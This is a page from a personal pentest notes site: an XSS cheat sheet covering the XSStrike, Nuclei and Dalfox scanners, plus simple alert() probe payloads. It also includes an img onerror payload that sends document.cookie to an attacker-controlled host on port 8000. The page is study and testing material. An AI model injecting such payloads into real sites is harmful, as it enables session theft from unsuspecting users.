yuyudhn's notes
  • About
  • πŸš‰QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • β›ˆοΈMisc
  • πŸͺŸActive Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • πŸ“³Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • πŸ•ΈοΈWeb Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • πŸ–ŠοΈMachine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page
  • Playground
  • Tools
  • Simple Payload
  • Resources

Was this helpful?

  1. Web Application

XSS

Cross-site scripting cheat sheet

PreviousFile InclusionNextMisc

Last updated 11 months ago

Was this helpful?

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Playground

Tools

XSStrike

XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.

# Install
git clone https://github.com/s0md3v/XSStrike
cd XSStrike
python3 -m venv xsstrike_env
source xsstrike_env/bin/activate
pip3 install -r requirements.txt

# run
python3 xsstrike.py -u "https://brutelogic.com.br/xss.php?a=fuzz" --fuzzer
python3 xsstrike.py -u "https://brutelogic.com.br/xss.php" --crawl -l 3
python3 xsstrike.py -u "https://brutelogic.com.br/xss.php?a=fuzz" --file xss.txt

Nuclei

Nuclei has some cool XSS detection template that can be used to hunt low hanging fruit XSS.

nuclei -u "https://brutelogic.com.br/xss.php?a=" -dast -tags xss -silent

Dalfox

DalFox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.

Usage:

# basic scan
dalfox url https://brutelogic.com.br/xss.php

# scan with custom payload
dalfox url https://brutelogic.com.br/xss.php --custom-payload xss-payload.txt --skip-bav --only-custom-payload

Simple Payload

This is a simple payload that I commonly use for XSS testing.

" autofocus onfocus=alert(document.domain) x="
"/><img src=x onerror=alert(document.domain) />

For Cookie Stealing

<img src="x" onerror="fetch('http://10.10.1.3:8000?c=' + encodeURIComponent(document.cookie))">

Resources

XSStrike
Nuclei XSS

Dalfox

πŸ•ΈοΈ
https://tryhackme.com/r/room/axss
https://brutelogic.com.br/xss.php
https://xss-labs.abay.sh/xss/
https://github.com/s0md3v/XSStrike
https://github.com/hahwul/dalfox
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
https://raw.githubusercontent.com/carlospolop/Auto_Wordlists/main/wordlists/xss.txt